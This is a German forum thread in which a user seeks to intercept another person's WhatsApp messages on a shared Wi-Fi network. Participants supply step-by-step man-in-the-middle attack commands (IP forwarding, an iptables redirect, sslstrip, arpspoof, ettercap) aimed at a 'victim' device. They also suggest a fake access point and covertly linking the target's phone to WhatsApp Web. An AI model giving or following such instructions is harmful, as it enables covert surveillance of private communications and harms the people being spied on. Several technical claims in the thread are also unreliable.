22 Antworten in diesem Thema

[nischke]

Hi zusammen,

 

ich bin auf der Suche nach einem Sniffer für das eigene W-LAN Netz. Es geht mir darum, whatsapp Nachricht von einem iPone mitzuschneiden. 

 

Ich hatte es schon mit WireShark versucht. Leider kein Erfolg, da Whatsapp ja mittlerweile die Nachrichten verschlüsselt. 

 

Ich hätte einen Rechner zur Verfügung, der im gleichen Netz ist oder aber ein Android Gerät. Es soll auch Android tools dafür geben. Allerdings ist das was man so im i-net findet sicherlich kein sniffer  

 

Vielen Dank schon mal für euer Unterstützung! 

 

PS: Der Weg zum Ziel ist mir eigentlich egal. Wie gesagt es kann auch was anderes sein  

[dev-0]

Hmmmm das könnte schwer werde da whatsapp denke ich mitlerweile ssl verschlüsselt.

das einzige was klappen könnte wär nen ssl striping

 

Kurz angerissen in etwa so:
 

Unter BT4 Final sind alle benötigten Programme/Scripte bereits installiert.

 

Im Prinzip ist das Programm/Tool/Script absolut einfach zu bedienen.

 

1. PC in den Forwarding Modus schalten.

Dazu Datei ip_forward im Verzeichnis /proc/sys/net/ipv4 von 0 auf 1 ändern!

 

2. Einstellen der Umleitung 

 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

10000 ist der Standard (listen-Port)

 

3. SSLStrip starten unter Angabe des obigen Ports

 

4. Man-in-the-Middle Angriff starten mit arpspoof

 

arpspoof -i (dein Interface) -t (Opfer) (Gateway)

 

 

 

 

Korrigiert mich wenn ich falsch liege aber so denke ich würde es wenn funktionieren 

[B1nary]

Richtig, Nachrichten sind SSL verschlüsselt.

 

Was lustigerweise plain übertragen wird, ist die Handynummer vom Whatsapp-Account beim Handshake mit dem Whatsapp-Server habe es selbst mal in meinem Netzwerk ausprobiert.

[dev-0]

lol ned schlecht  

sollte dochmal meinen cisco ap rauskramen und da nen traffic debuglog ziehen 

[nischke]

Hi Dev,

 

 

danke für deine Nachricht - ich gehe davon aus, dass BT4 Backtrack sein soll. Werde mich mal ein wenig einlesen müssen in diesem Thema. Hast du das ganze mal persönlich getestet? 

 

Danke schon mal für deine Antwort! 

Bearbeitet von nischke, 23 March 2015 - 21:45 Uhr.

[dev-0]

nein mit whatsapp nicht aber mit ssl im algemeinen.

[XoiL]

Was mag wohl passieren wenn man mit cain&able den Router poisoned und mit einem zweiten laptop den router sperrt / Attacked zb mit ChopChop Aircrack

und per netsh wlan set hostednetwork key=12345678 keyUsage=persistet ssid=i_read_your_whatsapp ein ap faked.

 

Ausprobieren und staunen.

 

Hat zumindest vor einem halben jahr ca super geklappt

 

LG XoiL

[nischke]

Hi,

 

habe hier noch interessantes Video zu gefunden: 

 

 

Falls jmd. wie ich noch auf der suche ist  

[Back_Space]

Ganz einfache Sache ... wenns im eigenen WLAN Netzwerk ist gehe ich mal davon aus das es Mitbewohner sind. Whatsapp kann per Browser aufgerufen werden , dazu muss mit dem Handy nur ein QR-Code am Laptop gescannt werden und schon hat man mit dem Laptop von überall darauf Zugriff.

 

Denke das wäre das einfachste :DD

[Xenio]

Ganz einfache Sache ... wenns im eigenen WLAN Netzwerk ist gehe ich mal davon aus das es Mitbewohner sind. Whatsapp kann per Browser aufgerufen werden , dazu muss mit dem Handy nur ein QR-Code am Laptop gescannt werden und schon hat man mit dem Laptop von überall darauf Zugriff.

 

Denke das wäre das einfachste :DD

Fällt leider sehr schnell auf, da die Person die aktiven Sessions leider sehen kann...

 

MfG Xenio

[Platin]

Fällt leider sehr schnell auf, da die Person die aktiven Sessions leider sehen kann...

 

MfG Xenio

Noch dazu schreibt er, dass die andere Person ein iPhone hat und WhatsappWeb derzeit nur auf Android unterstützt wird.

 

LG

[Xenio]

Genau, das habe ich sogar übersehen.

MfG

[nischke]

Hi,

 

danke an euch für die vielen Anregungen. Es richtig, dass es sich dabei um ein iPhone handelt. Ich bin immer noch mit Kali Linux am spielen. Habe bislang noch keinen Erfolg. Liegt sicherlich auch daran, dass ich bis zum Start des Topics keinerlei Erfahrungen mit Kali bzw. Linux hatte. Ich hatte mir zwischenzeitlich Dsplout für das Android geholt, in der Hoffnung, dass der SSL-Strip dabei einfacher funktionieren wird. Ich bin mir mitterweile auch gar nicht mehr sicher, ob man das ganze per SSL-Strip wirklich schafft. 

[FalkE]

klar funktioniert das via SSL-Strip. ich hab einen solchen MitM angriff mal per ettercap gezogen (

Please Login HERE or Register HERE to see this link!

), vorraussetzungen sind wie bei jedem MitM angriff natürlich das du in dem gleichen netzerk wie dein vic bist. dann einfach ettercap und ssl strip laufen lassen und abwarten.

 

was hier glaube ich fehlt ist der umgang mit unix, wobei kali ne GUI hat, sollte also wirklich nicht so schwer sein wenn man sich ein bisschen einliest und die tipps die oben in fülle gegeben wurden befolgt

[Xenio]

Hi,

 

danke an euch für die vielen Anregungen. Es richtig, dass es sich dabei um ein iPhone handelt. Ich bin immer noch mit Kali Linux am spielen. Habe bislang noch keinen Erfolg. Liegt sicherlich auch daran, dass ich bis zum Start des Topics keinerlei Erfahrungen mit Kali bzw. Linux hatte. Ich hatte mir zwischenzeitlich Dsplout für das Android geholt, in der Hoffnung, dass der SSL-Strip dabei einfacher funktionieren wird. Ich bin mir mitterweile auch gar nicht mehr sicher, ob man das ganze per SSL-Strip wirklich schafft. 

Hallo,

Whatsapp-Nachichten habe ich nocht nicht gesnifft, werde ich aber auch einmal testen...
Aber dafür ist mir das Sniffen von Viber Nachichten vor einigen Monaten gelungen.
Wie FalkE bereits geschrieben hat, fehlen dir die Grundlagen. Die solltest du auch ohne Große Probleme erlernen.

MfG Xenio

[Juri]

Noch dazu schreibt er, dass die andere Person ein iPhone hat und WhatsappWeb derzeit nur auf Android unterstützt wird.

 

LG

Mit iPhone gehts auch. Ein iDevice kann mehr als ein Android-Gerät. Merkt euch das!

Please Login HERE or Register HERE to see this link!

Bearbeitet von »Jura, 13 April 2015 - 22:32 Uhr.

[nischke]

klar funktioniert das via SSL-Strip. ich hab einen solchen MitM angriff mal per ettercap gezogen (

Please Login HERE or Register HERE to see this link!

), vorraussetzungen sind wie bei jedem MitM angriff natürlich das du in dem gleichen netzerk wie dein vic bist. dann einfach ettercap und ssl strip laufen lassen und abwarten.

 

was hier glaube ich fehlt ist der umgang mit unix, wobei kali ne GUI hat, sollte also wirklich nicht so schwer sein wenn man sich ein bisschen einliest und die tipps die oben in fülle gegeben wurden befolgt

Stimmt - wenn man keinerlei Erfahrung hat, ist das nicht so leicht. Erfahrungen vererben sich ja bekanntlich nicht, deshalb muss ich sie machen Mein anfängliches Problem war, dass ich nicht im richtigen Netz war. Wenn man eine VM Installiert, wird ein VMware Network Adapter erstellt. Das habe ich mittlerweile gelöst. Kannst du mir kurz Feedback geben, ob das Youtube Video, welches ich gepostet habe zum gewünschten Erfolg führt? Danke für deine Unterstützung! 

 

Kurze Frage zu meiner Vorgehensweise:

 

Ich mache die Schritte bzw. befehle wie folgt: 

 

ifconfig =

echo 1 >/proc/sys/net/ipv4/ip_forward

 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

 

route -n

 

nmap -sS -O GATEWAY/24

 

arpspoof -i eth0 -t VICTIM -r GATEWAY

 

sslstrip -l 8080

 

Wenn ich meinen eigenen Computer teste, kann ich danach keine Website mehr aufrufen. Auch der befehl cat ssltrip.log spuckt gar nichts aus. Jemand eine Idee, woran es liegen kann? 

[ziipzaaapM16A4]

Ditto ebenso das Problem.

zwar ist das schon wieder ein ding fürs neue thema.... ich glaube ich schreibe mal eins falls hier keine antwort kommen sollte

[Meikyo]

Dürfte man dabei nicht ohnehin auf das Problem treffen, dass alle aktuellen Apps Zertifikats-Pinning nutzen und bei einem untergeschobenen Zertifikat den Dienst verweigern?

[nischke]

Also ich habe es seinerzeit so nicht geschafft - kann aber auch an meinen Fähigkeiten liegen. Manchmal kann man aber mit der Brain.exe das Problem auch so lösen